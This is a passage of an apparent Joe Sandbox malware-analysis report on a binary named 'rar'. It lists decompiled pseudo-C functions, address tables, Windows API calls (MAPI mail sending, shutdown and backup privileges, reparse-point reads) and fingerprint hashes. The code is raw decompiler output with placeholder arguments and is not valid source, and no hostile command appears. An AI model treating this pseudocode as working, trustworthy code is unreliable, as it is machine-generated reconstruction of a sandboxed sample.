                                                                                                            0x7ff650b5a917
                                                                                                            0x7ff650b5a91f
                                                                                                            0x7ff650b5a923
                                                                                                            0x7ff650b5a928
                                                                                                            0x7ff650b5a92e
                                                                                                            0x7ff650b5a92e
                                                                                                            0x7ff650b5a936
                                                                                                            0x7ff650b5a93b
                                                                                                            0x7ff650b5a942
                                                                                                            0x7ff650b5a946
                                                                                                            0x7ff650b5a94a
                                                                                                            0x7ff650b5a94e
                                                                                                            0x7ff650b5a955
                                                                                                            0x7ff650b5a95d
                                                                                                            0x7ff650b5a965
                                                                                                            0x7ff650b5a96a
                                                                                                            0x7ff650b5a96e
                                                                                                            0x7ff650b5a975
                                                                                                            0x7ff650b5a98d
                                                                                                            0x7ff650b5a995
                                                                                                            0x7ff650b5a999
                                                                                                            0x7ff650b5a99e
                                                                                                            0x7ff650b5a9a3
                                                                                                            0x7ff650b5a9a7
                                                                                                            0x7ff650b5a9ac
                                                                                                            0x7ff650b5a9b1
                                                                                                            0x7ff650b5a9c5
                                                                                                            0x7ff650b5a9ca
                                                                                                            0x7ff650b5a9da
                                                                                                            0x7ff650b5a9e9
                                                                                                            0x7ff650b5a9f4
                                                                                                            0x7ff650b5a9f6
                                                                                                            0x7ff650b5aa04
                                                                                                            0x7ff650b5aa14
                                                                                                            0x7ff650b5aa1c
                                                                                                            0x7ff650b5aa1e
                                                                                                            0x7ff650b5aa21
                                                                                                            0x7ff650b5aa2e
                                                                                                            0x7ff650b5aa33
                                                                                                            0x7ff650b5aa38
                                                                                                            0x7ff650b5aa54
                                                                                                            0x7ff650b5aa61
                                                                                                            0x7ff650b5aa64
                                                                                                            0x7ff650b5aa70
                                                                                                            0x7ff650b5aa72
                                                                                                            0x7ff650b5aa77
                                                                                                            0x7ff650b5aa7c
                                                                                                            0x7ff650b5aa88
                                                                                                            0x7ff650b5aa8a
                                                                                                            0x7ff650b5aa8f
                                                                                                            0x7ff650b5aa94
                                                                                                            0x7ff650b5aa9c
                                                                                                            0x7ff650b5aaa0
                                                                                                            0x7ff650b5aaaa
                                                                                                            0x7ff650b5aab1
                                                                                                            0x7ff650b5aab5
                                                                                                            0x7ff650b5aaba
                                                                                                            0x7ff650b5aac4
                                                                                                            0x7ff650b5aacf
                                                                                                            0x7ff650b5aadc
                                                                                                            0x7ff650b5aae2
                                                                                                            0x7ff650b5aaeb
                                                                                                            0x7ff650b5aaf0
                                                                                                            0x7ff650b5aaf5
                                                                                                            0x7ff650b5aafb
                                                                                                            0x7ff650b5ab01
                                                                                                            0x7ff650b5ab05
                                                                                                            0x7ff650b5ab16
                                                                                                            0x7ff650b5ab19
                                                                                                            0x7ff650b5ab1d
                                                                                                            0x7ff650b5ab21
                                                                                                            0x7ff650b5ab3c
                                                                                                            0x7ff650b5ab43
                                                                                                            0x7ff650b5ab45
                                                                                                            0x7ff650b5ab45
                                                                                                            0x7ff650b5ab50
                                                                                                            0x7ff650b5ab52
                                                                                                            0x7ff650b5ab5d
                                                                                                            0x7ff650b5ab5f
                                                                                                            0x7ff650b5ab68
                                                                                                            0x7ff650b5ab6b
                                                                                                            0x7ff650b5ab6d
                                                                                                            0x7ff650b5ab7a
                                                                                                            0x7ff650b5ab83
                                                                                                            0x7ff650b5ab8c
                                                                                                            0x7ff650b5ab94
                                                                                                            0x7ff650b5ab9c
                                                                                                            0x7ff650b5aba3
                                                                                                            0x7ff650b5abaa
                                                                                                            0x7ff650b5abaf
                                                                                                            0x7ff650b5abbb
                                                                                                            0x7ff650b5abc4
                                                                                                            0x7ff650b5abc9
                                                                                                            0x7ff650b5abd6
                                                                                                            0x7ff650b5abde
                                                                                                            0x7ff650b5abe7
                                                                                                            0x7ff650b5abec
                                                                                                            0x7ff650b5ac1d

                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(000000FF,?,?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5A840
                                                                                                            • GetProcAddress.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5A858
                                                                                                            • GetProcAddress.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5A870
                                                                                                            • GetCurrentDirectoryW.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5A8CA
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5A905
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5AB83
                                                                                                            • FreeLibrary.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5AB8C
                                                                                                            • FreeLibrary.KERNEL32(?,00000000,00000000,0000E980,?,00007FF650B12FC9), ref: 00007FF650B5ABEC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                            • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                            • API String ID: 3483800833-4165214152
                                                                                                            • Opcode ID: 1d11dac1947ec9e96a0952e3ede30d3015c3a681cd7987f9b066f1b2fbd39821
                                                                                                            • Instruction ID: 92f987cec10e26671e0f50af2ce38a0593b7a81cc4d1c8f175649b16cefc6434
                                                                                                            • Opcode Fuzzy Hash: 1d11dac1947ec9e96a0952e3ede30d3015c3a681cd7987f9b066f1b2fbd39821
                                                                                                            • Instruction Fuzzy Hash: 7FC1C076A08B83A5EB14DF21E8802A927A0FF46B84F484035DE4FA7795EF3ED544C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5AEBC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesStateSuspendValueWindows
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 651064505-3733053543
                                                                                                            • Opcode ID: bfd7df738314aa855e18b4e9df0e899f7077bc303c3836d8e91c1b890c1f68aa
                                                                                                            • Instruction ID: 384b40e44220eb3b0c381e69916893ff7a79845761e30e74db1c7dbb277e78b0
                                                                                                            • Opcode Fuzzy Hash: bfd7df738314aa855e18b4e9df0e899f7077bc303c3836d8e91c1b890c1f68aa
                                                                                                            • Instruction Fuzzy Hash: 1A21C3B5A28743A2F7909B20E4D577A73A0EF86740F685035D50FE6754DE3EE0458600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2E0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146fileCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00007FF67FF650B2E0E0(void* __ecx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				int _t57;
				void* _t72;
				unsigned int _t74;
				unsigned int _t76;
				void* _t84;
				void* _t85;
				void* _t86;
				signed long long _t102;
				signed long long _t103;
				long long _t105;
				void* _t106;
				void* _t107;
				void* _t134;
				intOrPtr* _t135;
				void* _t138;
				WCHAR* _t140;
				void* _t141;
				void* _t143;
				signed long long _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t152;
				WCHAR* _t154;
				void* _t155;
				void* _t157;
				signed long long _t158;

				_t148 = __r9;
				_t146 = __r8;
				_t105 = __rbx;
				_t72 = __ecx;
				goto 0x50b2e0e8;
				asm("int3");
				asm("int3");
				asm("int3");
				 *((long long*)(_t143 + 0x18)) = __rbx;
				 *((long long*)(_t143 + 0x20)) = __rsi;
				_t141 = _t143 - 0x11d0;
				E00007FF67FF650B69CB0(0x12d0, __rax, _t149, _t150);
				_t144 = _t143 - __rax;
				_t102 =  *0x50b978f0; // 0x27db226282f1
				_t103 = _t102 ^ _t144;
				 *(_t141 + 0x11c0) = _t103;
				_t138 = __rdx;
				_t155 = __rcx;
				r12d = 0;
				_t86 =  *0x50ba799e - r12b; // 0x0
				if (_t86 != 0) goto 0x50b2e145;
				E00007FF67FF650B2EE14(__rbx, L"SeBackupPrivilege", __rdx, _t157);
				 *0x50ba799e = 1;
				FindFirstFileW(_t154);
				if (_t103 == 0xffffffff) goto 0x50b2e31c;
				FindClose(_t152);
				if (( *(_t144 + 0x70) & 0x00000400) == 0) goto 0x50b2e31c;
				if ( *((intOrPtr*)(_t141 - 0x6c)) == 0xa0000003) goto 0x50b2e18a;
				if ( *((intOrPtr*)(_t141 - 0x6c)) != 0xa000000c) goto 0x50b2e31c;
				 *(_t144 + 0x30) = _t152;
				 *((intOrPtr*)(_t144 + 0x28)) = 0x2200000;
				 *((intOrPtr*)(_t144 + 0x20)) = 3;
				r9d = 0;
				_t15 = _t148 + 1; // 0x1
				r8d = _t15;
				CreateFileW(_t140, ??, ??, ??, ??, ??);
				_t158 = _t103;
				if (_t103 != 0xffffffff) goto 0x50b2e1d0;
				E00007FF67FF650B2CB04(_t72, 0x50ba7ab8, __rcx);
				goto 0x50b2e31c;
				E00007FF67FF650B11344(_t103, _t144 + 0x48);
				 *(_t144 + 0x38) = _t152;
				 *(_t144 + 0x30) = _t144 + 0x40;
				 *((intOrPtr*)(_t144 + 0x28)) = 0x4000;
				_t135 =  *((intOrPtr*)(_t144 + 0x48));
				 *((long long*)(_t144 + 0x20)) = _t135;
				r9d = 0;
				r8d = 0;
				_t57 = DeviceIoControl(??, ??, ??, ??, ??, ??, ??, ??);
				CloseHandle(_t134);
				if (_t57 != 0) goto 0x50b2e236;
				E00007FF67FF650B2CBDC(0x50ba7ab8, __rcx);
				goto 0x50b2e312;
				r14d = 0x800;
				r15d = 0x1000;
				if ( *_t135 != 0xa0000003) goto 0x50b2e297;
				_t74 = ( *(_t135 + 0xa) & 0x0000ffff) >> 1;
				_t130 = _t135 + (__rcx + 8) * 2;
				if (_t74 - r14d >= 0) goto 0x50b2e312;
				r8d = _t74;
				E00007FF67FF650B72910(_t84, _t85, _t141 + 0x1c0, _t135 + (__rcx + 8) * 2, _t135, _t146);
				_t106 = _t105 + _t105;
				if (_t106 - _t158 >= 0) goto 0x50b2e347;
				 *((intOrPtr*)(_t141 + _t106 + 0x1c0)) = r12w;
				 *((intOrPtr*)(_t138 + 0x1118)) = 3;
				if ( *_t135 != 0xa000000c) goto 0x50b2e2e4;
				_t76 = ( *(_t135 + 0xa) & 0x0000ffff) >> 1;
				if (_t76 - r14d >= 0) goto 0x50b2e312;
				r8d = _t76;
				E00007FF67FF650B72910(_t84, _t85, _t141 + 0x1c0, _t135 + (_t130 + 0xa) * 2, _t135, _t146);
				_t107 = _t106 + _t106;
				if (_t107 - _t158 >= 0) goto 0x50b2e347;
				 *((intOrPtr*)(_t141 + _t107 + 0x1c0)) = r12w;
				 *((intOrPtr*)(_t138 + 0x1118)) = 2;
				if ( *((intOrPtr*)(_t138 + 0x1118)) == r12d) goto 0x50b2e312;
				_t40 = _t138 + 0x111c; // 0x191c
				E00007FF67FF650B5A390(_t40, _t141 + 0x1c0, _t155);
				 *(_t138 + 0x211c) =  *(_t144 + 0x70) >> 0x00000004 & 0x00000001;
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t144 + 0x48), _t76,  *(_t141 + 0x11c0) ^ _t144);
			}
































                                                                                                            0x7ff650b2e0e0
                                                                                                            0x7ff650b2e0e0
                                                                                                            0x7ff650b2e0e0
                                                                                                            0x7ff650b2e0e0
                                                                                                            0x7ff650b2e0e0
                                                                                                            0x7ff650b2e0e5
                                                                                                            0x7ff650b2e0e6
                                                                                                            0x7ff650b2e0e7
                                                                                                            0x7ff650b2e0e8
                                                                                                            0x7ff650b2e0ed
                                                                                                            0x7ff650b2e0fa
                                                                                                            0x7ff650b2e107
                                                                                                            0x7ff650b2e10c
                                                                                                            0x7ff650b2e10f
                                                                                                            0x7ff650b2e116
                                                                                                            0x7ff650b2e119
                                                                                                            0x7ff650b2e120
                                                                                                            0x7ff650b2e123
                                                                                                            0x7ff650b2e126
                                                                                                            0x7ff650b2e129
                                                                                                            0x7ff650b2e130
                                                                                                            0x7ff650b2e139
                                                                                                            0x7ff650b2e13e
                                                                                                            0x7ff650b2e14d
                                                                                                            0x7ff650b2e157
                                                                                                            0x7ff650b2e160
                                                                                                            0x7ff650b2e16e
                                                                                                            0x7ff650b2e17b
                                                                                                            0x7ff650b2e184
                                                                                                            0x7ff650b2e18a
                                                                                                            0x7ff650b2e18f
                                                                                                            0x7ff650b2e197
                                                                                                            0x7ff650b2e19f
                                                                                                            0x7ff650b2e1a6
                                                                                                            0x7ff650b2e1a6
                                                                                                            0x7ff650b2e1ad
                                                                                                            0x7ff650b2e1b3
                                                                                                            0x7ff650b2e1ba
                                                                                                            0x7ff650b2e1c6
                                                                                                            0x7ff650b2e1cb
                                                                                                            0x7ff650b2e1dc
                                                                                                            0x7ff650b2e1e2
                                                                                                            0x7ff650b2e1ec
                                                                                                            0x7ff650b2e1f1
                                                                                                            0x7ff650b2e1f5
                                                                                                            0x7ff650b2e1fa
                                                                                                            0x7ff650b2e1ff
                                                                                                            0x7ff650b2e202
                                                                                                            0x7ff650b2e20d
                                                                                                            0x7ff650b2e218
                                                                                                            0x7ff650b2e220
                                                                                                            0x7ff650b2e22c
                                                                                                            0x7ff650b2e231
                                                                                                            0x7ff650b2e236
                                                                                                            0x7ff650b2e23c
                                                                                                            0x7ff650b2e248
                                                                                                            0x7ff650b2e254
                                                                                                            0x7ff650b2e25a
                                                                                                            0x7ff650b2e261
                                                                                                            0x7ff650b2e269
                                                                                                            0x7ff650b2e273
                                                                                                            0x7ff650b2e278
                                                                                                            0x7ff650b2e27e
                                                                                                            0x7ff650b2e284
                                                                                                            0x7ff650b2e28d
                                                                                                            0x7ff650b2e29d
                                                                                                            0x7ff650b2e2a9
                                                                                                            0x7ff650b2e2b6
                                                                                                            0x7ff650b2e2ba
                                                                                                            0x7ff650b2e2c4
                                                                                                            0x7ff650b2e2c9
                                                                                                            0x7ff650b2e2cf
                                                                                                            0x7ff650b2e2d1
                                                                                                            0x7ff650b2e2da
                                                                                                            0x7ff650b2e2eb
                                                                                                            0x7ff650b2e2ed
                                                                                                            0x7ff650b2e2fe
                                                                                                            0x7ff650b2e30c
                                                                                                            0x7ff650b2e346

                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(000000FF,?,00000000,00000001,?,00007FF650B121BB), ref: 00007FF650B2E14D
                                                                                                            • FindClose.KERNEL32(?,00007FF650B121BB), ref: 00007FF650B2E160
                                                                                                            • CreateFileW.KERNEL32(?,00007FF650B121BB), ref: 00007FF650B2E1AD
                                                                                                              • Part of subcall function 00007FF650B2EE14: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF650B2ECFF), ref: 00007FF650B2EE37
                                                                                                              • Part of subcall function 00007FF650B2EE14: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF650B2ECFF), ref: 00007FF650B2EE48
                                                                                                              • Part of subcall function 00007FF650B2EE14: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF650B2EE6B
                                                                                                              • Part of subcall function 00007FF650B2EE14: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF650B2EE8E
                                                                                                              • Part of subcall function 00007FF650B2EE14: GetLastError.KERNEL32 ref: 00007FF650B2EE98
                                                                                                              • Part of subcall function 00007FF650B2EE14: CloseHandle.KERNEL32 ref: 00007FF650B2EEAB
                                                                                                            • DeviceIoControl.KERNEL32 ref: 00007FF650B2E20D
                                                                                                            • CloseHandle.KERNEL32(?,00007FF650B121BB), ref: 00007FF650B2E218
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID: SeBackupPrivilege
                                                                                                            • API String ID: 3094086963-2429070247
                                                                                                            • Opcode ID: 3f7ee818883c50ab00720b2b1830a6ddc2e097dec0e9b74090cbf108cb8d1849
                                                                                                            • Instruction ID: 8e569f40c0ebb6dbcf4778915b9bfe64a676b42fba6cd806f73b817855e437a1
                                                                                                            • Opcode Fuzzy Hash: 3f7ee818883c50ab00720b2b1830a6ddc2e097dec0e9b74090cbf108cb8d1849
                                                                                                            • Instruction Fuzzy Hash: D651D832A08643A6E754CF15E8802E97360FB46354F484135EB6FA7B94DF3ED555C704
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6AAF0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 45%
                                                                                                            			E00007FF67FF650B6AAF0(signed int __ecx, void* __rax, long long __rbx) {
				void* _t35;
				void* _t36;
				int _t38;
				void* _t58;
				void* _t76;
				long _t79;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t58 = __rax;
				 *((long long*)(_t82 + 8)) = __rbx;
				_t80 = _t82 - 0x4c0;
				_t83 = _t82 - 0x5c0;
				if (IsProcessorFeaturePresent(_t79) == 0) goto 0x50b6ab1a;
				asm("int 0x29");
				_t35 = E00007FF67FF650B6AAE8(_t34);
				r8d = 0x4d0;
				_t36 = E00007FF67FF650B6C1A0(_t35, 0, _t80 - 0x10, _t76, _t85);
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t58 == 0) goto 0x50b6ab9a;
				 *(_t83 + 0x38) =  *(_t83 + 0x38) & 0x00000000;
				 *((long long*)(_t83 + 0x30)) = _t80 + 0x4e0;
				 *((long long*)(_t83 + 0x28)) = _t80 + 0x4e8;
				 *((long long*)(_t83 + 0x20)) = _t80 - 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t80 + 0xe8)) =  *((intOrPtr*)(_t80 + 0x4c8));
				r8d = 0x98;
				 *((long long*)(_t80 + 0x88)) = _t80 + 0x4d0;
				E00007FF67FF650B6C1A0(_t36, 0, _t83 + 0x50,  *((intOrPtr*)(_t80 + 0x4d8)),  *((intOrPtr*)(_t80 + 0xe8)));
				 *((long long*)(_t83 + 0x60)) =  *((intOrPtr*)(_t80 + 0x4c8));
				 *((intOrPtr*)(_t83 + 0x50)) = 0x40000015;
				 *((intOrPtr*)(_t83 + 0x54)) = 1;
				_t38 = IsDebuggerPresent();
				 *((long long*)(_t83 + 0x40)) = _t83 + 0x50;
				 *((long long*)(_t83 + 0x48)) = _t80 - 0x10;
				SetUnhandledExceptionFilter(??);
				if (UnhandledExceptionFilter(??) != 0) goto 0x50b6ac2a;
				if ((__ecx & 0xffffff00 | _t38 == 0x00000001) != 0) goto 0x50b6ac2a;
				return E00007FF67FF650B6AAE8(_t40);
			}













                                                                                                            0x7ff650b6aaf0
                                                                                                            0x7ff650b6aaf0
                                                                                                            0x7ff650b6aaf6
                                                                                                            0x7ff650b6aafe
                                                                                                            0x7ff650b6ab14
                                                                                                            0x7ff650b6ab18
                                                                                                            0x7ff650b6ab1f
                                                                                                            0x7ff650b6ab2a
                                                                                                            0x7ff650b6ab30
                                                                                                            0x7ff650b6ab39
                                                                                                            0x7ff650b6ab50
                                                                                                            0x7ff650b6ab53
                                                                                                            0x7ff650b6ab5c
                                                                                                            0x7ff650b6ab5e
                                                                                                            0x7ff650b6ab75
                                                                                                            0x7ff650b6ab84
                                                                                                            0x7ff650b6ab8d
                                                                                                            0x7ff650b6ab94
                                                                                                            0x7ff650b6aba6
                                                                                                            0x7ff650b6abb6
                                                                                                            0x7ff650b6abc0
                                                                                                            0x7ff650b6abc7
                                                                                                            0x7ff650b6abd3
                                                                                                            0x7ff650b6abd8
                                                                                                            0x7ff650b6abe0
                                                                                                            0x7ff650b6abe8
                                                                                                            0x7ff650b6abf6
                                                                                                            0x7ff650b6ac02
                                                                                                            0x7ff650b6ac09
                                                                                                            0x7ff650b6ac1c
                                                                                                            0x7ff650b6ac20
                                                                                                            0x7ff650b6ac3a

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
                                                                                                            • Opcode ID: 310f56e5b3194acc2b92fed39c9521969384521765309beb1cd42a0db9367b89
                                                                                                            • Instruction ID: e68a8e93deea140745ee42d4ad8e14aa579414d2ddf23874569f23c5c4ae19e6
                                                                                                            • Opcode Fuzzy Hash: 310f56e5b3194acc2b92fed39c9521969384521765309beb1cd42a0db9367b89
                                                                                                            • Instruction Fuzzy Hash: 49317472619B829AEB608F60E8903ED7360FB85744F48443ADB4E97B94DF3DD548CB14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4A7C0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 504COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E00007FF67FF650B4A7C0(void* __ecx, void* __edx, void* __ebp, void* __eflags, void* __rax, long long __rbx, long long __rcx, long long __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t162;
				signed int _t192;
				void* _t213;
				signed int _t245;
				signed int _t246;
				signed int _t251;
				signed int _t255;
				void* _t257;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				signed long long _t312;
				void* _t313;
				void* _t314;
				intOrPtr _t339;
				signed int _t340;
				signed int _t350;
				signed long long _t364;
				signed long long _t365;
				signed long long _t366;
				signed long long _t367;
				long long _t369;
				signed int _t371;
				signed int _t372;
				intOrPtr _t383;
				long long _t390;
				signed long long _t392;
				signed int _t411;
				void* _t426;
				void* _t460;
				void* _t468;
				signed long long _t469;
				void* _t471;
				void* _t472;
				long long _t474;
				signed long long _t475;
				signed long long _t476;
				intOrPtr* _t481;
				void* _t483;
				void* _t484;
				void* _t486;
				signed long long _t487;
				void* _t501;
				void* _t502;
				void* _t503;
				long long _t504;
				signed int _t508;
				intOrPtr _t509;
				void* _t511;
				intOrPtr* _t512;
				intOrPtr _t516;
				long long _t518;
				void* _t525;
				signed long long _t526;
				signed int _t533;
				intOrPtr _t535;

				_t388 = __rbx;
				_t313 = __ebp;
				_t257 = __ecx;
				 *((long long*)(_t486 + 0x20)) = __rbx;
				_t484 = _t486 - 0xaf90;
				E00007FF67FF650B69CB0(0xb090, __rax, _t501, _t502);
				_t487 = _t486 - __rax;
				_t364 =  *0x50b978f0; // 0x27db226282f1
				_t365 = _t364 ^ _t487;
				 *(_t484 + 0xaf80) = _t365;
				_t472 = __r8;
				_t504 = __rdx;
				 *((long long*)(_t487 + 0x68)) = __rdx;
				_t512 = __rcx;
				 *((long long*)(_t487 + 0x78)) = __rcx;
				E00007FF67FF650B173C8(__rbx, _t484 - 0x50, __rdx, __r8, _t525, _t518);
				_t162 = E00007FF67FF650B1AA04(_t257, _t365, _t484 - 0x50, __r8);
				r14d = 0;
				if (_t162 == 0) goto 0x50b4af4a;
				r15b =  *((intOrPtr*)(_t484 + 0x7f32));
				_t9 = _t518 + 5; // 0x5
				E00007FF67FF650B1E9C4(_t9, _t365, _t388, _t484 - 0x50, __r8, _t484);
				if (_t365 == 0) goto 0x50b4a851;
				 *((char*)(_t487 + 0x50)) = 1;
				if ( *((intOrPtr*)(_t484 + 0x580e)) != r14b) goto 0x50b4a856;
				 *((intOrPtr*)(_t487 + 0x50)) = r14b;
